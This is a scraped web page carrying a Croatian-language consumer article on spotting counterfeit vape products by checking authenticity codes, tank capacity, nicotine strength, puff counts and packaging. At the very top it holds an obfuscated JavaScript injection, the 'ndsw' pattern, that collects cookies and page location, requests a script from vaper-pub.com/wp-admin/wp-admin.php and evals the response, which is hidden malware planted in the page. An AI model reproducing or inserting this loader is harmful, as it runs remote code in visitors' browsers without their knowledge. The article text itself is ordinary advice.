;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Kako prepoznati lažne vape proizvode: Sedam stvari koje treba provjeriti

Krivotvoreni proizvodi već su desetljećima problem s gotovo svakim proizvodom, a vape tržište nije nikakva iznimka. Posljednjih godina, postoje brojne kopije najpopularnijih proizvode za vape, uključujući vape modove, atomizere, POD-ove, jednokratne e-cigarete, baterije, punjače i tako dalje.

Morate biti izuzetno oprezni gdje kupujete svoje proizvode. Međutim, čak i ako svoje proizvode kupite od renomiranog izvora, još uvijek postoji mogućnost da je krivotvorina ušla u njihov inventar bez njihovog znanja. Dakle, što možete učiniti?

Proći ćemo kroz neke važne aspekte tržišta lažnih proizvoda, kao i zašto ih treba izbjegavati. Također detaljno opisujemo niz stvari koje potrošači mogu učiniti kako bi izbjegli da postanu žrtve krivotvorenih proizvoda za vaping.

Kako prepoznati lažni proizvod?

Prvi korak u zaštiti od krivotvorenih proizvoda je znati kako ih prepoznati. Nažalost, budući da puno ovih proizvoda dolazi iz Shenzhena u Kini – istog mjesta gdje se proizvode pravi proizvodi – to može biti prilično teško.

Nije tajna da vejperi nisu najveći ljubitelji propisa, ponajviše jer se pojedini zakoni i dalje drže zastarjelog pogleda na e-cigarete. Naravno, propisi se mijenjaju od mjesta do mjesta, stoga je važno biti u tijeku sa zakonima svoje zemlje o vapingu. Ujedinjeno Kraljevstvo ima vjerojatno najbolji sustav u hvatanju krivotvorina. Usvajanje i promicanje upotrebe vape proizvoda na dobro reguliranom tržištu, umjesto prohibicionističke taktike koja se nalazi u mjestima poput SAD-a, znači da se mala odstupanja koja koriste proizvođači krivotvorenih proizvoda mogu lakše uhvatiti.

Kupujte na provjerenim mjestima

Najbolji način da se zaštitite od lažnih proizvoda za vaping je kupnja u uglednoj trgovini. Bez obzira radi li se o internetskoj trgovini ili klasičnom vape shopu, pobrinite se da su pouzdani. Možete malo istražiti trgovinu u kojoj kupujete kako biste vidjeli jesu li neki drugi potrošači prijavili kupnju krivotvorina na toj lokaciji. Također možete provjeriti recenzije te trgovine. U većini slučajeva najbolja je odluka kupnja u poznatoj i dugotrajnoj trgovini vape proizvoda. Naravno, ako vam susjed Đuro kaže kaže da vam može nabaviti najnoviji vape mod za 5 eura, kolika je šansa da je mod pravi? Ponekad se samo treba voditi glasom razuma.

Provjerite oznaku/kod autentičnosti

Većina proizvođača svjesna je da postoje lažne verzije njihovih proizvoda. Kako bi zaštitili svoje potrošače, mnogi proizvođači označavaju svoje vape proizvode kodom ili naljepnicom autentičnosti koja se može koristiti za provjeru je li proizvod pravi ili ne.

Ova oznaka za potvrdu autentičnosti najčešće se nalazi na jednokratnim vape-ovima i e-tekućinama, ali ponekad se može pronaći i na modovima, atomizerima i POD-ovima.

Provjerite pakiranje vašeg proizvoda i potražite sjajna naljepnicu ili QR kod. U većini slučajeva samo skenirate QR kod ili unesete kod s kutije na web stranicu proizvođača. Ako želite biti sigurni da je vaš proizvod autentičan, ovo je jedan od najboljih načina da to doznate.

Provjerite maksimalni kapacitet

Jedan od najjednostavnijih načina da se utvrdi je li jednokratni vape krivotvoren je ako je njegov kapacitet spremnika veći od dopuštene veličine ili veličine ponuđene na web stranici proizvođača. To posebno vrijedi za europsko tržište gdje su ta ograničenja uobičajena.

Na primjer, vape s kapacitetom većim od 2 ml vrlo je vjerojatno lažnjak na većini mjesta u Europi.

U dobru i zlu, ovakva ograničenja ne postoje u većem dijelu SAD-a, što znači da može biti potrebno više znanja da se uhvati lažnjak.

Međutim, potrošači mogu na web-mjestu marke provjeriti kapacitet naveden za određeni proizvod. Ako proizvod koji vide u trgovini ne odgovara ovome, vjerojatno je krivotvorina.

Kolika je jačina nikotina?

Slično tome, koncentracija nikotina još je jedan jasan način razlikovanja pravog od krivotvorine.

U većini europskih zemalja uvedeno je ograničenje od 20 mg/ml ili 2%. Međutim, 50 mg/ml ili 5% vrlo je uobičajena koncentracija za jednokratnu upotrebu.

U SAD-u još ne postoje takvi propisi, ali o nacionalnoj granici od 20 mg/ml raspravlja se već nekoliko godina.

Provjerite ukupni broj povlačenja

Neki jednokratni vejpovi će se odreći informacije o veličini spremnika i umjesto toga svoje proizvode označiti ukupnim prosječnim brojem udisaja.

U Europi je to obično ograničeno na 600 povlačenja.

“Proizvodi koje vidimo da trenutno dolaze u zemlju imaju 3500 udisaja, a neki imaju 7000 udisaja, tako da su ilegalni i ne mogu se nikome isporučivati”, rekao je James Whiddett u intervjuu za BBC.

Opet, budući da u Americi još nema ograničenja kapaciteta, ovo nije primjenjivo. Međutim, ako uređaj nudi veličinu spremnika koja ne odgovara procijenjenim udisajima, to bi mogao biti rezultat nelegitimnog pakiranja lažnog proizvoda.

Kao gruba procjena, spremnik od 2 ml trebao bi dati između 600 i 800 udisaja.

Koji je najveći kapacitet boce za dopunjavanje e-tekućine

Korak dalje od proizvoda za jednokratnu upotrebu mogu se naći i krivotvorene boce za ponovno punjenje. Punjenje e-tekućine ograničeno je u Europi na 10 ml, tako da je sve veće vjerojatno lažni proizvod. Naravno, ovdje govorimo o gotovim tekućinama koje sadrže nikotin. Ukoliko kupujete longfill, dobit ćete ga u boci većeg kapaciteta.

Usporedite pakiranje

U slučaju proizvoda koji ispunjava sve gore navedeno, još uvijek mogu postojati načini da se otkriju lažni proizvodi.

Legitimni proizvođači obično će potrošiti pristojnu količinu vremena i novca kako bi osigurali da njihov proizvod izgleda visokokvalitetno. Proizvođači krivotvorina nisu toliko zabrinuti zbog toga, radije žele uštedjeti na troškovima.

Pakiranje s pravopisnim pogreškama, mutnim slikama ili slovima ili netočnim fontovima i logotipima gotovo će uvijek biti lažni proizvod. Opet, to znači da je važno provjeriti kako bi proizvod trebao izgledati na web stranici proizvođača.

Dodajući tome, sve jednokratne e-cigarete dolazit će u zatvorenom pakiranju. Ako trgovac na malo prodaje proizvod koji nije zapečaćen na ovaj način, to ne samo da može biti krivotvoreni proizvod, već se može i neovlašteno mijenjati.

Choose your Reaction!
Leave a Comment